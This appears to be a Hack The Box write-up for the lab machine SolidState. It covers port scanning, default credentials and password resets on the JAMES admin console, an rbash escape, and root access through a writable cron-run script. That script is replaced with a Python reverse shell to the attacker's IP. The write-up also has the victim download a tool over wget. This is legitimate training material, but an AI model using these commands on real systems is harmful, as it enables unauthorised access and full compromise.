---
title: "Solidstate Hackthebox"
date: 2021-06-17T00:56:23+02:00
draft: false
image: "/static/HACKING/solidstate-icon.png"
categories:
    - Hack-The-Box
---

![<- Not working](/static/HACKING/solidstate-index.jpg)

# [*] INDEX: 

- [BOX INFO](#-box-info--)
- [GAINING ACCESS](#-part-1---gain-access)
- [PRIVILEGE ESCALATION](#-part-2---privesc)

# [+] BOX INFO 💻 :

```
Operative System : Linux 🐧
Difficulty : Medium 🌓
Owner : ch33zplz
IP : 10.10.10.51
```
# [+] PART 1 - GAIN ACCESS

The first step is scanning machine's ports with nmap:

> [nmap -p- -T5 -n 10.10.10.51 -oG allPorts](https://explainshell.com/explain?cmd=nmap+-p-+-T5+-n+10.10.10.51+-oG+allPorts)

```s
[*] Extracting information....

        [*] IP Adress: 10.10.10.51
        [*] Open ports: 22,25,80,110,119,4555

[*] Ports has been copied to clipboard
```

Let's get a deeper scan on those ports :

> [nmap -p22,25,80,110,119,4555 -sC -sV 10.10.10.51](https://explainshell.com/explain?cmd=nmap+-p22%2C25%2C80%2C110%2C119%2C4555+-sC+-sV+10.10.10.51)

```s
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.15 [10.10.14.15]), 
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.91%I=7%D=6/13%Time=60C61499%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\nPl
SF:ease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPasswo
SF:rd:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

We can see that there is a service called JAMES, and on port 4555 there is a login, let's try with default creds :

![<- Not working](/static/HACKING/solidstate-1.png)

It worked! Let's check the list of commands :

> HELP

```bash
Currently implemented commands:                                                               
help                                    display this help                                     
listusers                               display existing accounts                             
countusers                              display the number of existing accounts               
adduser [username] [password]           add a new user                                                  
verify [username]                       verify if specified user exist                                  
deluser [username]                      delete existing user                                            
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection
```

Let's list the users with **listusers:**

```
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
```

As we can see in the list of commands, we can change users password with the command **setpassword**, let's change their passwords to "password":

![<- Not working](/static/HACKING/solidstate-2.png)

This could be for the service JAMES, so let's try to log in to the port 110, we'll use telnet:

![<- Not working](/static/HACKING/solidstate-3.png)

All the commands I have used can be found [here](https://www.shellhacks.com/retrieve-email-pop3-server-command-line/)

So as we can see, the james' files are emty, so let's try with the rest of users ...

![<- Not working](/static/HACKING/solidstate-4.png)

John has a file, let0s see wht it is :

![<- Not working](/static/HACKING/solidstate-5.png)

Interesting... Let's check mindy :

![<- Not working](/static/HACKING/solidstate-6.png)
![<- Not working](/static/HACKING/solidstate-7.png)

Nice, some creds! Let's login through ssh:
![<- Not working](/static/HACKING/solidstate-8.png)

# [+] PART 2 - PRIVESC

![<- Not working](/static/HACKING/solidstate-9.png)

This shell is kinda weird, this is a restricted bash as the email suggested. I tried to "bypass" that with the following command : 

> [ssh mindy@10.10.10.51 -t "bash --noprofile"](https://explainshell.com/explain?cmd=ssh+mindy%4010.10.10.51+-t+%22bash+--noprofile%22)

![<- Not working](/static/HACKING/solidstate-10.png)

It worked! I escaped from the limited shell 😆. After ennumerating the system for a while this is what I found inside /opt :

![<- Not working](/static/HACKING/solidstate-11.png)

```py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()
```

There is a file owned by root, which we are allowed to edit, given that weird file let's check if it's being run. In my case I'll be using Pspy :

### From our local machine :

> [python3 -m http.server 80](https://explainshell.com/explain?cmd=python3+-m+http.server+80)

### From the victim machine :

> [wget 10.10.14.15/pspy32](https://explainshell.com/explain?cmd=wget+10.10.14.15%2Fpspy32)

> [chmod +x pspy32](https://explainshell.com/explain?cmd=chmod+%2Bx+pspy32)

> ./pspy32

![<- Not working](/static/HACKING/solidstate-12.png)

Now, if we wait and check the output of the script we can point out this :

![<- Not working](/static/HACKING/solidstate-13.png)

That's right, as we could guess, the script is running periodically as root, let's try to change the tmp.py to:

```py
#!/usr/bin/env python
import os
os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.15/8989 0>&1'")
```

Now we just have to listen from our port 8989 :

![<- Not working](/static/HACKING/solidstate-14.png)

And wait ...

![<- Not working](/static/HACKING/solidstate-15.png)

# THANKS FOR READING 😊 !!